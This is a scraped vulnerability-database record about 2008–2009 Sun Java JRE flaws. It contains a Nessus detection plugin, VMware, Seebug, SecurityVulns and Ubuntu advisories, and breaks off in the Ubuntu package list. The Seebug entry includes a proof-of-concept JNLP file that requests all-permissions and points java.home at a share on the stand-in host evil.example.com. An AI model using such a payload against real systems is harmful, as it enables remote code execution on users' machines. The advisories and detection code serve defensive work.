9e465556e126a0905f8d88a4b18be6957a0752c1dbc3aaf5b5223f2280c9d80db50e72911fc7591993af0b259b2869d2af6f5e9828df318dc91b861644a2c799828c126951cc96d7a85af9a3e8ac0c5605cafac4c456e23adbf02a880b229c9e41ba3d11da378cacff6ebe8c37ca8e30c4abda90ca83ee8add5646a19768be6c0165dfd08bfbdcc86049f0b3a939b88e7bd5661d52fb759827269cc0c68926e7a0cbc62b775abfe7353bbed1f8aa5642b6cf453f3d22e4c03e3c353db3749e0ee44a5f23f811647bcf4c82b21de6534fe022659abe5cd6e192e1cec4c599c35cb81c8a40f0a52b4f869c341610872d778021c8bbcb37f8be3f5cd79463f34063fa391bfaafa6f39836c7234dce7c7bd6d9252314745af1bbd7d725f7a60ddf41754452f175108a3748450bdb3c008546191108140711c59e56b151c73255e17ac17a8ffa76f420c7b1a6985fa024ce6a6525556ab5f3a329fc3057c624e45076f91af0d78c22bb4b7513a12b92c8d2541d86c84fb1476dcdcad43708233ea968e7cc30260af989c7f5ef9d35cecf933adad68186dfa6f009005c5a0212d97dd98bacdac350c7db304bc644b7fb71a532fcec80111c70f710c1c9ab81af97085ba343534a604be0c847ce353feb2d0fa68055039ea8cc386f4f07a2df66956a3892aa48e50286acc4e219f566b4e5f083877b162fa5162b4240cf5ea3095d86ae\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39766);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2008-2086\",\n \"CVE-2008-5339\",\n \"CVE-2008-5340\",\n \"CVE-2008-5341\",\n \"CVE-2008-5342\",\n \"CVE-2008-5343\",\n \"CVE-2008-5344\",\n \"CVE-2008-5345\",\n \"CVE-2008-5346\",\n \"CVE-2008-5348\",\n \"CVE-2008-5349\",\n \"CVE-2008-5350\",\n \"CVE-2008-5351\",\n \"CVE-2008-5352\",\n \"CVE-2008-5353\",\n \"CVE-2008-5354\",\n \"CVE-2008-5356\",\n \"CVE-2008-5357\",\n \"CVE-2008-5359\",\n \"CVE-2008-5360\",\n \"CVE-2009-1093\",\n \"CVE-2009-1094\",\n \"CVE-2009-1095\",\n \"CVE-2009-1096\",\n \"CVE-2009-1098\",\n \"CVE-2009-1099\",\n \"CVE-2009-1100\",\n \"CVE-2009-1101\",\n \"CVE-2009-1103\",\n \"CVE-2009-1104\",\n \"CVE-2009-1107\"\n );\n script_bugtraq_id(32892, 34240);\n\n script_name(english:\"Mac OS X : Java for Mac OS X 10.4 Release 9\");\n script_summary(english:\"Check for Java Release 9 on Mac OS X 10.4\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a version of Java that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X 10.4 host is running a version of Java for Mac OS\nX older than release 9.\n\nThe remote version of this software contains several security\nvulnerabilities. A remote attacker could exploit these issues to\nbypass security restrictions, disclose sensitive information, cause a\ndenial of service, or escalate privileges.\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.apple.com/kb/HT3633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.apple.com/archives/Security-announce/2009/Jun/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Java for Mac OS X 10.4 release 9.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var ret, buf;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(0);\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n\n if (buf !~ \"^[0-9]\") exit(0);\n\n buf = chomp(buf);\n return buf;\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(0);\n\n\n# Mac OS X 10.4.11 only.\nuname = get_kb_item(\"Host/uname\");\nif (egrep(pattern:\"Darwin.* 8\\.11\\.\", string:uname))\n{\n plist = \"/System/Library/Frameworks/JavaVM.framework/Versions/A/Resources/version.plist\";\n cmd = string(\n \"cat \", plist, \" | \",\n \"grep -A 1 CFBundleVersion | \",\n \"tail -n 1 | \",\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\''\n );\n version = exec(cmd:cmd);\n if (!strlen(version)) exit(0);\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Fixed in version 11.9.0.\n if (\n ver[0] < 11 ||\n (ver[0] == 11 && ver[1] < 9)\n ) security_hole(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:48", "bulletinFamily": "unix", "description": "a. Service Console update for DHCP and third party library update for DHCP client. \n \nDHCP is an Internet-standard protocol by which a computer can be \nconnected to a local network, ask to be given configuration \ninformation, and receive from a server enough information to \nconfigure itself as a member of that network.\n\n \nA stack-based buffer overflow in the script_write_params method in \nISC DHCP dhclient allows remote DHCP servers to execute arbitrary \ncode via a crafted subnet-mask option.\n\n \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) \nhas assigned the name CVE-2009-0692 to this issue.\n\n \nAn insecure temporary file use flaw was discovered in the DHCP \ndaemon's init script (\"/etc/init.d/dhcpd\"). A local attacker could \nuse this flaw to overwrite an arbitrary file with the output of the \n\"dhcpd -t\" command via a symbolic link attack, if a system \nadministrator executed the DHCP init script with the \"configtest\", \n\"restart\", or \"reload\" option.\n\n \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) \nhas assigned the name CVE-2009-1893 to this issue.\n\n \nThe following table lists what action remediates the vulnerability \nin the Service Console (column 4) if a solution is available. \n\n", "modified": "2010-01-06T00:00:00", "published": "2009-10-16T00:00:00", "id": "VMSA-2009-0014", "href": "https://www.vmware.com/security/advisories/VMSA-2009-0014.html", "title": "VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues", "type": "vmware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:19:48", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 32620,32608\r\nCVE(CAN) ID: CVE-2008-5339,CVE-2008-5340,CVE-2008-5341,CVE-2008-5342,CVE-2008-5343,CVE-2008-5344,CVE-2008-5345,CVE-2008-5346,CVE-2008-5347,CVE-2008-5348,CVE-2008-5349,CVE-2008-5350,CVE-2008-5351,CVE-2008-5352,CVE-2008-5353,CVE-2008-5354,CVE-2008-5355,CVE-2008-5356,CVE-2008-5357,CVE-2008-5358,CVE-2008-5359,CVE-2008-5360,CVE-2008-2086\r\n\r\nSolaris\u7cfb\u7edf\u7684Java\u8fd0\u884c\u65f6\u73af\u5883\uff08JRE\uff09\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u3002 \r\n\r\nSun Java\u4e2d\u7684\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u6076\u610f\u7528\u6237\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3001\u6cc4\u9732\u7cfb\u7edf\u4fe1\u606f\u3001\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u6709\u6f0f\u6d1e\u7684\u7cfb\u7edf\u3002\r\n\r\n1) JRE\u521b\u5efa\u4e86\u540d\u79f0\u4e0d\u8fc7\u968f\u673a\u7684\u4e34\u65f6\u6587\u4ef6\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u5199\u5165\u4efb\u610fJAR\u6587\u4ef6\u5e76\u6267\u884c\u6709\u9650\u7684\u64cd\u4f5c\u3002\r\n\r\n2) Java AWT\u5e93\u5728\u5904\u7406\u56fe\u5f62\u6a21\u578b\u65f6\u5b58\u5728\u9519\u8bef\uff0c\u5728ConvolveOp\u64cd\u4f5c\u4e2d\u4f7f\u7528\u7684\u7279\u5236Raster\u56fe\u5f62\u6a21\u578b\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n3) Java Web Start\u5728\u5904\u7406\u67d0\u4e9bGIF\u5934\u503c\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684splash logo\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u3002\r\n\r\n4) \u5904\u7406TrueType\u5b57\u4f53\u65f6\u7684\u6574\u6570\u6ea2\u51fa\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n5) JRE\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u521b\u5efa\u5230\u4efb\u610f\u4e3b\u673a\u7684\u7f51\u7edc\u8fde\u63a5\u3002\r\n\r\n6) \u542f\u52a8Java Web Start\u5e94\u7528\u7a0b\u5e8f\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684\u5e94\u7528\u7a0b\u5e8f\u4ee5\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n7) \u4e0d\u53ef\u4fe1\u4efb\u7684Java Web Start\u5e94\u7528\u7a0b\u5e8f\u53ef\u4ee5\u83b7\u53d6\u5f53\u524d\u7528\u6237\u540d\u548cJava Web Start\u7f13\u5b58\u7684\u4f4d\u7f6e\u3002\r\n\r\n8) Java Web Start\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684JNLP\u6587\u4ef6\u4fee\u6539\u7cfb\u7edf\u5c5e\u6027\uff0c\u5982java.home\u3001java.ext.dirs\u548cuser.home\u3002\r\n\r\n9) Java Web Start\u548cJava Plug-in\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u52ab\u6301HTTP\u4f1a\u8bdd\u3002\r\n\r\n10) JRE applet\u7c7b\u52a0\u8f7d\u529f\u80fd\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\u548c\u521b\u5efa\u5230\u4efb\u610f\u4e3b\u673a\u7684\u7f51\u7edc\u8fde\u63a5\u3002\r\n\r\n11) Java Web Start BasicService\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6253\u5f00\u4efb\u610f\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n12) Java Update\u673a\u5236\u6ca1\u6709\u68c0\u67e5\u4e0b\u8f7d\u7684\u66f4\u65b0\u8f6f\u4ef6\u5305\u7684\u6570\u5b57\u7b7e\u540d\uff0c\u8fd9\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u4e2d\u95f4\u4eba\u6216DNS\u4f2a\u9020\u653b\u51fb\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n13) \u5728\u5904\u7406JAR\u6587\u4ef6\u7684Main-Class\u6e05\u5355\u9879\u65f6\u7684\u8fb9\u754c\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684JAR\u6587\u4ef6\u5bfc\u81f4\u6808\u6ea2\u51fa\u3002\r\n\r\n14) \u8fd8\u539f\u5e8f\u5217\u53f7\u65e5\u5386\u5bf9\u8c61\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684Java applet\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n15) JRE\u4e2d\u7684\u6574\u6570\u6ea2\u51fa\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684Pack200\u538b\u7f29JAR\u6587\u4ef6\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n16) UTF-8\u89e3\u7801\u5668\u63a5\u53d7\u957f\u4e8e\u6700\u77ed\u8868\u5355\u7684\u7f16\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u4f7f\u7528\u89e3\u7801\u5668\u7684\u5e94\u7528\u7a0b\u5e8f\u901a\u8fc7\u7279\u5236URI\u63a5\u53d7\u65e0\u6548\u7684\u5e8f\u5217\u548c\u6cc4\u9732\u654f\u611f\u4fe1\u606f\u3002\r\n\r\n17) JRE\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u5217\u51fa\u7528\u6237\u4e3b\u76ee\u5f55\u7684\u5185\u5bb9\u3002\r\n\r\n18) \u5904\u7406RSA\u516c\u94a5\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u6d88\u8017\u5927\u91cfCPU\u8d44\u6e90\u3002\r\n\r\n19) JRE Kerberos\u8ba4\u8bc1\u673a\u5236\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u8017\u5c3d\u64cd\u4f5c\u7cfb\u7edf\u8d44\u6e90\u3002\r\n\r\n20) JAX-WS\u548cJAXB JRE\u8f6f\u4ef6\u5305\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684Java applet\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n21) \u5904\u7406ZIP\u6587\u4ef6\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u6cc4\u9732\u4e3b\u673a\u8fdb\u7a0b\u7684\u4efb\u610f\u5185\u5b58\u4f4d\u7f6e\u3002\r\n\r\n22) \u4ece\u672c\u5730\u6587\u4ef6\u7cfb\u7edf\u6240\u52a0\u8f7d\u7684\u6076\u610f\u4ee3\u7801\u53ef\u80fd\u83b7\u53d6\u5bf9\u672c\u5730\u4e3b\u673a\u7684\u7f51\u7edc\u8bbf\u95ee\u3002\r\n\r\n23) \u5904\u7406TrueType\u5b57\u4f53\u65f6\u7684\u8fb9\u754c\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\n\nSun JDK <= 6 Update 10\r\nSun JDK <= 5.0 Update 16\r\nSun JRE <= 6 Update 10\r\nSun JRE <= 5.0 Update 16\r\nSun SDK 1.4.2\r\nSun SDK 1.3.1\n RedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2008:1025-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2008:1025-01\uff1aCritical: java-1.5.0-sun security update\r\n\u94fe\u63a5\uff1a<a href=https://www.redhat.com/support/errata/RHSA-2008-1025.html target=_blank>https://www.redhat.com/support/errata/RHSA-2008-1025.html</a>\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-246387\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-246387\uff1aA Security Vulnerability in the Java Runtime Environment may Allow Code Loaded From the Local Filesystem to Access LocalHost\r\n\u94fe\u63a5\uff1a<a href=http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1 target=_blank>http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n<a href=http://java.sun.com/javase/downloads/index.jsp target=_blank>http://java.sun.com/javase/downloads/index.jsp</a>\r\n<a href=http://java.sun.com/javase/downloads/index_jdk5.jsp target=_blank>http://java.sun.com/javase/downloads/index_jdk5.jsp</a>\r\n<a href=http://java.sun.com/j2se/1.4.2/download.html target=_blank>http://java.sun.com/j2se/1.4.2/download.html</a>\r\n<a href=http://java.sun.com/j2se/1.3/download.html target=_blank>http://java.sun.com/j2se/1.3/download.html</a>", "modified": "2008-12-09T00:00:00", "published": "2008-12-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4532", "id": "SSV:4532", "title": "Sun Java JDK/JRE\u5b89\u5168\u66f4\u65b0\u4fee\u590d\u591a\u4e2a\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n <jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">\r\n <information>\r\n <title>Trusted Application</title>\r\n <vendor>Trusted Vendor</vendor>\r\n <description>Trusted Application by Trusted Vendor</description>\r\n <homepage href="http://trusted.example.org/" />\r\n <offline-allowed />\r\n </information>\r\n <security><all-permissions /></security>\r\n <resources>\r\n <j2se version="1.5+" />\r\n <!-- Next line overrides the JRE's java.home System property -->\r\n <property name="java.home" value="\\\\evil.example.com\\jre" />\r\n <jar href="signed-and-trusted-jce-dependent-library.jar" />\r\n </resources>\r\n <application-desc main-class="org.example.trusted.app.StartApp" />\r\n </jnlp>\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-4532"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:31", "bulletinFamily": "software", "description": "JNLP may overwrite system properties java.home\r\njava.ext.dirs\r\nuser.home\r\nHeap overflow and integer overflow on TrueType fonts parsing, memory corruption on GIF parsing, integer overflow on Pack200 decompression. Multiple sendbox protection bypass vulnerabilities.", "modified": "2009-04-23T00:00:00", "published": "2009-04-23T00:00:00", "id": "SECURITYVULNS:VULN:9483", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9483", "title": "Sun Java JRE / JDK / Web Start multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "description": "===========================================================\r\nUbuntu Security Notice USN-713-1 January 27, 2009\r\nopenjdk-6 vulnerabilities\r\nCVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350,\r\nCVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354,\r\nCVE-2008-5358, CVE-2008-5359, CVE-2008-5360\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 8.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 8.10:\r\n icedtea6-plugin 6b12-0ubuntu6.1\r\n openjdk-6-jdk 6b12-0ubuntu6.1\r\n openjdk-6-jre 6b12-0ubuntu6.1\r\n openjdk-6-jre-headless 6b12-0ubuntu6.1\r\n openjdk-6-jre-lib 6b12-0ubuntu6.1\r\n\r\nAfter a standard system upgrade you need to restart any Java applications\r\nto effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that Java did not correctly handle untrusted applets.\r\nIf a user were tricked into running a malicious applet, a remote attacker\r\ncould gain user privileges, or list directory contents. (CVE-2008-5347,\r\nCVE-2008-5350)\r\n\r\nIt was discovered that Kerberos authentication and RSA public key\r\nprocessing were not correctly handled in Java. A remote attacker\r\ncould exploit these flaws to cause a denial of service. (CVE-2008-5348,\r\nCVE-2008-5349)\r\n\r\nIt was discovered that Java accepted UTF-8 encodings that might be\r\nhandled incorrectly by certain applications. A remote attacker could\r\nbypass string filters, possible leading to other exploits. (CVE-2008-5351)\r\n\r\nOverflows were discovered in Java JAR processing. If a user or\r\nautomated system were tricked into processing a malicious JAR file,\r\na remote attacker could crash the application, leading to a denial of\r\nservice. (CVE-2008-5352, CVE-2008-5354)\r\n\r\nIt was discovered that Java calendar objects were not unserialized safely.\r\nIf a user or automated system were tricked into processing a specially\r\ncrafted calendar object, a remote attacker could execute arbitrary code\r\nwith user privileges. (CVE-2008-5353)\r\n\r\nIt was discovered that the Java image handling code could lead to memory\r\ncorruption. If a user or automated system were tricked into processing\r\na specially crafted image, a remote attacker could crash the application,\r\nleading to a denial of service. (CVE-2008-5358, CVE-2008-5359)\r\n\r\nIt was discovered that temporary files created by Java had predictable\r\nnames. If a user or automated system were tricked into processing a\r\nspecially crafted JAR file, a remote attacker could overwrite sensitive\r\ninformation. (CVE-2008-5360)\r\n\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.diff.gz\r\n Size/MD5: 222090 25681e25a40ae36385d2429e8b905009\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.dsc\r\n Size/MD5: 2355 281bc682638116538e829499572e3cde\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12.orig.tar.gz\r\n Size/MD5: 54363262 f3aa01206f2192464b998fb7cc550686\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 8468244 7746db24f22ff25e7655bd9ad73b7077\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 4708568 3e9ffbcebcadc431e5c1a21b80e9a9b7\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 25619670 4eb18b9cdd11778e80ce6b1ac63c2040\r\n http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-source-files_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 49156890 044fa2fafc22c35568c01e46f85dbf0a\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 81028 8f3c35e45a001a5bb5e7d7231656e206\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 47370572 db9493bf071aa08183a7aeef6efc71ea\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 2366078 639ac32c62c5b951a77a0a58fcf8ee70\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 9942620 ac6600eb8cddc9afd55d37a646ba3a89\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 24087518 d9b0e9f7a0f6df9392eed8c67fa77acd\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 241532 404e268000d8d15e903f67eb4383146e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 71520 9af6963e6ddc977bd05a8dbbe40f1139\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 101844924 fcdcbeacbb5f2854f68efa196e6d0ab3\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 2348616 6313881219ebbee2ee650685bcb6105f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 9949838 366df23097c855e2d329dec6bf9f9d24\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 25169062 1354f7327a8df3422a442f37b357f77a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 230678 59ed425557f18fba815bcbf9b17c6d1d\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 72102 c3317b35cd38f7b4ab607bf49331e440\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 101930608 292954d99c81b528891824548c6b885e\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 2345410 fc2cd7ec4e96749e39307f756231fdc3\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 9945176 4a8fb4a2b021f7ce6729dca9b0eef67c\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 25192978 cccb11f6580b47ab30c981a0a8cea0f6\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 227450 abf58752fcf129175266e60b86857f8c\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 77056 790776ea3f41a2392e6c9666402428c0\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 35896200 55947cfd47a40e248a626adcb601b4da\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 2393068 c475228e916c602eea348b0382f51f21\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 8599254 97e338f60e55a488ef0ba06bc23cf414\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 22974726 e3bf13b8599a94a0b89f2757a90800f5\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 255456 54b666eaaf464931a56406d09cfff088\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 70100 b4addb80ceb8e01dd8819a1bc3b8c89a\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 103684964 9f7150e6e1675831b723cdbae5b5c963\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 2355110 38f63636383fcb60ba60552ca4e0c60c\r\n 